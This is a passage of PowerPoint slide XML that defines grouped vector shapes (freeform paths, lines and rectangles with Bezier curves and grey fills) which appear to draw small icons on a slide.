                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1912" y="2428"/>
                    <a:ext cx="252" cy="68"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 17020"/>
                      <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                      <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                      <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                      <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                      <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                      <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                      <a:gd name="T7" fmla="*/ 0 h 4567"/>
                      <a:gd name="T8" fmla="*/ 0 w 17020"/>
                      <a:gd name="T9" fmla="*/ 1711 h 45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7020" h="4567">
                        <a:moveTo>
                          <a:pt x="0" y="1711"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="10647" y="4567"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17020" y="2859"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1711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C0C0C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" name="Freeform 761"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2283"/>
                    <a:ext cx="186" cy="243"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12585"/>
                      <a:gd name="T1" fmla="*/ 0 h 16411"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                      <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                      <a:gd name="T8" fmla="*/ 0 w 12585"/>
                      <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13033"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="16411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="337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969696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" name="Freeform 762"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2045" y="2329"/>
                    <a:ext cx="14" cy="197"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 971"/>
                      <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                      <a:gd name="T2" fmla="*/ 971 w 971"/>
                      <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                      <a:gd name="T4" fmla="*/ 971 w 971"/>
                      <a:gd name="T5" fmla="*/ 0 h 13293"/>
                      <a:gd name="T6" fmla="*/ 0 w 971"/>
                      <a:gd name="T7" fmla="*/ 260 h 13293"/>
                      <a:gd name="T8" fmla="*/ 0 w 971"/>
                      <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                        <a:moveTo>
                          <a:pt x="0" y="13293"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="971" y="13030"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="13293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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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3" name="Freeform 763"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2279"/>
                    <a:ext cx="200" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                      <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                      <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                      <a:gd name="T4" fmla="*/ 0 w 13556"/>
                      <a:gd name="T5" fmla="*/ 260 h 3638"/>
                      <a:gd name="T6" fmla="*/ 971 w 13556"/>
                      <a:gd name="T7" fmla="*/ 0 h 3638"/>
                      <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T9" fmla="*/ 3378 h 36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556" h="3638">
                        <a:moveTo>
                          <a:pt x="13556" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3638"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13556" y="3378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C0C0C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90" name="Group 764"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4990" y="2536"/>
                <a:ext cx="288" cy="276"/>
                <a:chOff x="2210" y="1518"/>
                <a:chExt cx="1345" cy="1285"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="491" name="Freeform 765"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2210" y="1518"/>
                  <a:ext cx="1345" cy="1285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1345 w 1345"/>
                    <a:gd name="T1" fmla="*/ 359 h 1285"/>
                    <a:gd name="T2" fmla="*/ 1345 w 1345"/>
                    <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                    <a:gd name="T4" fmla="*/ 0 w 1345"/>
                    <a:gd name="T5" fmla="*/ 923 h 1285"/>
                    <a:gd name="T6" fmla="*/ 0 w 1345"/>
                    <a:gd name="T7" fmla="*/ 0 h 1285"/>
                    <a:gd name="T8" fmla="*/ 1345 w 1345"/>
                    <a:gd name="T9" fmla="*/ 359 h 1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5" h="1285">
                      <a:moveTo>
                        <a:pt x="1345" y="359"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1345" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="923"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1345" y="35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92" name="Freeform 766"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3141" y="2283"/>
                  <a:ext cx="234" cy="383"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 234 w 234"/>
                    <a:gd name="T1" fmla="*/ 62 h 383"/>
                    <a:gd name="T2" fmla="*/ 234 w 234"/>
                    <a:gd name="T3" fmla="*/ 383 h 383"/>
                    <a:gd name="T4" fmla="*/ 0 w 234"/>
                    <a:gd name="T5" fmla="*/ 321 h 383"/>
                    <a:gd name="T6" fmla="*/ 0 w 234"/>
                    <a:gd name="T7" fmla="*/ 0 h 383"/>
                    <a:gd name="T8" fmla="*/ 234 w 234"/>
                    <a:gd name="T9" fmla="*/ 62 h 3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4" h="383">
                      <a:moveTo>
                        <a:pt x="234" y="62"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="234" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="321"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234" y="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93" name="Freeform 767"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3196" y="2361"/>
                  <a:ext cx="118" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 118 w 118"/>
                    <a:gd name="T1" fmla="*/ 59 h 59"/>
                    <a:gd name="T2" fmla="*/ 118 w 118"/>
                    <a:gd name="T3" fmla="*/ 31 h 59"/>
                    <a:gd name="T4" fmla="*/ 0 w 118"/>
                    <a:gd name="T5" fmla="*/ 0 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 118"/>
                    <a:gd name="T7" fmla="*/ 26 h 59"/>
                    <a:gd name="T8" fmla="*/ 118 w 118"/>
                    <a:gd name="T9" fmla="*/ 59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8" h="59">
                      <a:moveTo>
                        <a:pt x="118" y="59"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="118" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="118" y="59"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0C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94" name="Freeform 768"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3141" y="1867"/>
                  <a:ext cx="234" cy="383"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 234 w 234"/>
                    <a:gd name="T1" fmla="*/ 62 h 383"/>
                    <a:gd name="T2" fmla="*/ 234 w 234"/>
                    <a:gd name="T3" fmla="*/ 383 h 383"/>
                    <a:gd name="T4" fmla="*/ 0 w 234"/>
                    <a:gd name="T5" fmla="*/ 322 h 383"/>
                    <a:gd name="T6" fmla="*/ 0 w 234"/>
                    <a:gd name="T7" fmla="*/ 0 h 383"/>
                    <a:gd name="T8" fmla="*/ 234 w 234"/>
                    <a:gd name="T9" fmla="*/ 62 h 3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4" h="383">
                      <a:moveTo>
                        <a:pt x="234" y="62"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="234" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="322"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234" y="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95" name="Freeform 769"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3196" y="1945"/>
                  <a:ext cx="118" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 118 w 118"/>
                    <a:gd name="T1" fmla="*/ 59 h 59"/>
                    <a:gd name="T2" fmla="*/ 118 w 118"/>
                    <a:gd name="T3" fmla="*/ 31 h 59"/>
                    <a:gd name="T4" fmla="*/ 0 w 118"/>
                    <a:gd name="T5" fmla="*/ 0 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 118"/>
                    <a:gd name="T7" fmla="*/ 26 h 59"/>
                    <a:gd name="T8" fmla="*/ 118 w 118"/>
                    <a:gd name="T9" fmla="*/ 59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8" h="59">
                      <a:moveTo>
                        <a:pt x="118" y="59"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="118" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="118" y="59"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="0C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96" name="Line 770"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2787" y="1955"/>
                  <a:ext cx="111" cy="31"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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97" name="Freeform 771"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2895" y="1952"/>
                  <a:ext cx="64" cy="67"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 64"/>
                    <a:gd name="T1" fmla="*/ 67 h 67"/>
                    <a:gd name="T2" fmla="*/ 64 w 64"/>
                    <a:gd name="T3" fmla="*/ 50 h 67"/>
                    <a:gd name="T4" fmla="*/ 0 w 64"/>
                    <a:gd name="T5" fmla="*/ 0 h 67"/>
                    <a:gd name="T6" fmla="*/ 0 w 64"/>
                    <a:gd name="T7" fmla="*/ 67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4" h="67">
                      <a:moveTo>
                        <a:pt x="0" y="67"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="64" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0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98" name="Line 772"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2787" y="2404"/>
                  <a:ext cx="111" cy="30"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="15875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499" name="Freeform 773"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2895" y="2401"/>
                  <a:ext cx="64" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 64"/>
                    <a:gd name="T1" fmla="*/ 66 h 66"/>
                    <a:gd name="T2" fmla="*/ 64 w 64"/>
                    <a:gd name="T3" fmla="*/ 50 h 66"/>
                    <a:gd name="T4" fmla="*/ 0 w 64"/>
                    <a:gd name="T5" fmla="*/ 0 h 66"/>
                    <a:gd name="T6" fmla="*/ 0 w 64"/>
                    <a:gd name="T7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4" h="66">
                      <a:moveTo>
                        <a:pt x="0" y="66"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="64" y="50"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="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Freeform 774"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2368" y="2245"/>
                  <a:ext cx="251" cy="232"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 106"/>
                    <a:gd name="T1" fmla="*/ 62 h 98"/>
                    <a:gd name="T2" fmla="*/ 8 w 106"/>
                    <a:gd name="T3" fmla="*/ 72 h 98"/>
                    <a:gd name="T4" fmla="*/ 98 w 106"/>
                    <a:gd name="T5" fmla="*/ 96 h 98"/>
                    <a:gd name="T6" fmla="*/ 105 w 106"/>
                    <a:gd name="T7" fmla="*/ 91 h 98"/>
                    <a:gd name="T8" fmla="*/ 106 w 106"/>
                    <a:gd name="T9" fmla="*/ 36 h 98"/>
                    <a:gd name="T10" fmla="*/ 98 w 106"/>
                    <a:gd name="T11" fmla="*/ 26 h 98"/>
                    <a:gd name="T12" fmla="*/ 8 w 106"/>
                    <a:gd name="T13" fmla="*/ 2 h 98"/>
                    <a:gd name="T14" fmla="*/ 0 w 106"/>
                    <a:gd name="T15" fmla="*/ 7 h 98"/>
                    <a:gd name="T16" fmla="*/ 0 w 106"/>
                    <a:gd name="T17" fmla="*/ 62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6" h="98">
                      <a:moveTo>
                        <a:pt x="0" y="62"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="67"/>
                        <a:pt x="3" y="71"/>
                        <a:pt x="8" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="72"/>
                        <a:pt x="8" y="72"/>
                        <a:pt x="98" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="98"/>
                        <a:pt x="105" y="95"/>
                        <a:pt x="105" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="91"/>
                        <a:pt x="105" y="91"/>
                        <a:pt x="106" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="31"/>
                        <a:pt x="102" y="27"/>
                        <a:pt x="98" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="26"/>
                        <a:pt x="98" y="26"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="46"/>
                        <a:pt x="0" y="6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01" name="Freeform 775"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="2113"/>
                  <a:ext cx="154" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 65"/>
                    <a:gd name="T1" fmla="*/ 61 h 66"/>
                    <a:gd name="T2" fmla="*/ 0 w 65"/>
                    <a:gd name="T3" fmla="*/ 24 h 66"/>
                    <a:gd name="T4" fmla="*/ 33 w 65"/>
                    <a:gd name="T5" fmla="*/ 5 h 66"/>
                    <a:gd name="T6" fmla="*/ 65 w 65"/>
                    <a:gd name="T7" fmla="*/ 41 h 66"/>
                    <a:gd name="T8" fmla="*/ 32 w 65"/>
                    <a:gd name="T9" fmla="*/ 61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5" h="66">
                      <a:moveTo>
                        <a:pt x="32" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="56"/>
                        <a:pt x="0" y="40"/>
                        <a:pt x="0" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="9"/>
                        <a:pt x="15" y="0"/>
                        <a:pt x="33" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="10"/>
                        <a:pt x="65" y="26"/>
                        <a:pt x="65" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="57"/>
                        <a:pt x="50" y="66"/>
                        <a:pt x="32" y="6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Freeform 776"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2368" y="1813"/>
                  <a:ext cx="251" cy="229"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 106"/>
                    <a:gd name="T1" fmla="*/ 62 h 97"/>
                    <a:gd name="T2" fmla="*/ 8 w 106"/>
                    <a:gd name="T3" fmla="*/ 72 h 97"/>
                    <a:gd name="T4" fmla="*/ 98 w 106"/>
                    <a:gd name="T5" fmla="*/ 96 h 97"/>
                    <a:gd name="T6" fmla="*/ 105 w 106"/>
                    <a:gd name="T7" fmla="*/ 90 h 97"/>
                    <a:gd name="T8" fmla="*/ 106 w 106"/>
                    <a:gd name="T9" fmla="*/ 35 h 97"/>
                    <a:gd name="T10" fmla="*/ 98 w 106"/>
                    <a:gd name="T11" fmla="*/ 25 h 97"/>
                    <a:gd name="T12" fmla="*/ 8 w 106"/>
                    <a:gd name="T13" fmla="*/ 1 h 97"/>
                    <a:gd name="T14" fmla="*/ 0 w 106"/>
                    <a:gd name="T15" fmla="*/ 7 h 97"/>
                    <a:gd name="T16" fmla="*/ 0 w 106"/>
                    <a:gd name="T17" fmla="*/ 62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6" h="97">
                      <a:moveTo>
                        <a:pt x="0" y="62"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="66"/>
                        <a:pt x="3" y="71"/>
                        <a:pt x="8" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="72"/>
                        <a:pt x="8" y="72"/>
                        <a:pt x="98" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="97"/>
                        <a:pt x="105" y="94"/>
                        <a:pt x="105" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="90"/>
                        <a:pt x="105" y="90"/>
                        <a:pt x="106" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="31"/>
                        <a:pt x="102" y="26"/>
                        <a:pt x="98" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="25"/>
                        <a:pt x="98" y="25"/>
                        <a:pt x="8" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="45"/>
                        <a:pt x="0" y="6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03" name="Freeform 777"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1678"/>
                  <a:ext cx="154" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 32 w 65"/>
                    <a:gd name="T1" fmla="*/ 61 h 66"/>
                    <a:gd name="T2" fmla="*/ 0 w 65"/>
                    <a:gd name="T3" fmla="*/ 24 h 66"/>
                    <a:gd name="T4" fmla="*/ 33 w 65"/>
                    <a:gd name="T5" fmla="*/ 5 h 66"/>
                    <a:gd name="T6" fmla="*/ 65 w 65"/>
                    <a:gd name="T7" fmla="*/ 42 h 66"/>
                    <a:gd name="T8" fmla="*/ 32 w 65"/>
                    <a:gd name="T9" fmla="*/ 61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5" h="66">
                      <a:moveTo>
                        <a:pt x="32" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="57"/>
                        <a:pt x="0" y="40"/>
                        <a:pt x="0" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="9"/>
                        <a:pt x="15" y="0"/>
                        <a:pt x="33" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="10"/>
                        <a:pt x="65" y="26"/>
                        <a:pt x="65" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="57"/>
                        <a:pt x="50" y="66"/>
                        <a:pt x="32" y="6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8" name="Group 911"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8821554" y="2379285"/>
              <a:ext cx="307886" cy="310389"/>
              <a:chOff x="4573" y="2536"/>
              <a:chExt cx="246" cy="248"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="549" name="Group 910"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4748" y="2713"/>
                <a:ext cx="71" cy="71"/>
                <a:chOff x="4748" y="2713"/>
                <a:chExt cx="71" cy="71"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="572" name="Rectangle 779"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4796" y="2760"/>
                  <a:ext cx="23" cy="24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573" name="Rectangle 780"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4748" y="2713"/>
                  <a:ext cx="42" cy="4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50" name="Group 909"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4573" y="2536"/>
                <a:ext cx="169" cy="171"/>
                <a:chOff x="4633" y="2597"/>
                <a:chExt cx="109" cy="110"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="551" name="Rectangle 781"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4633" y="2597"/>
                  <a:ext cx="109" cy="110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1B171B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552" name="Group 782"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4644" y="2629"/>
                  <a:ext cx="87" cy="46"/>
                  <a:chOff x="1819" y="1496"/>
                  <a:chExt cx="1970" cy="1025"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="553" name="Freeform 783"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2525" y="1496"/>
                    <a:ext cx="1264" cy="796"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 535 w 535"/>
                      <a:gd name="T1" fmla="*/ 17 h 337"/>
                      <a:gd name="T2" fmla="*/ 518 w 535"/>
                      <a:gd name="T3" fmla="*/ 0 h 337"/>
                      <a:gd name="T4" fmla="*/ 17 w 535"/>
                      <a:gd name="T5" fmla="*/ 0 h 337"/>
                      <a:gd name="T6" fmla="*/ 0 w 535"/>
                      <a:gd name="T7" fmla="*/ 17 h 337"/>
                      <a:gd name="T8" fmla="*/ 0 w 535"/>
                      <a:gd name="T9" fmla="*/ 320 h 337"/>
                      <a:gd name="T10" fmla="*/ 17 w 535"/>
                      <a:gd name="T11" fmla="*/ 337 h 337"/>
                      <a:gd name="T12" fmla="*/ 518 w 535"/>
                      <a:gd name="T13" fmla="*/ 337 h 337"/>
                      <a:gd name="T14" fmla="*/ 535 w 535"/>
                      <a:gd name="T15" fmla="*/ 320 h 337"/>
                      <a:gd name="T16" fmla="*/ 535 w 535"/>
                      <a:gd name="T17" fmla="*/ 17 h 3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35" h="337">
                        <a:moveTo>
                          <a:pt x="535" y="17"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="535" y="7"/>
                          <a:pt x="528" y="0"/>
                          <a:pt x="5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8" y="0"/>
                          <a:pt x="0" y="7"/>
                          <a:pt x="0" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="320"/>
                          <a:pt x="0" y="320"/>
                          <a:pt x="0" y="320"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="329"/>
                          <a:pt x="8" y="337"/>
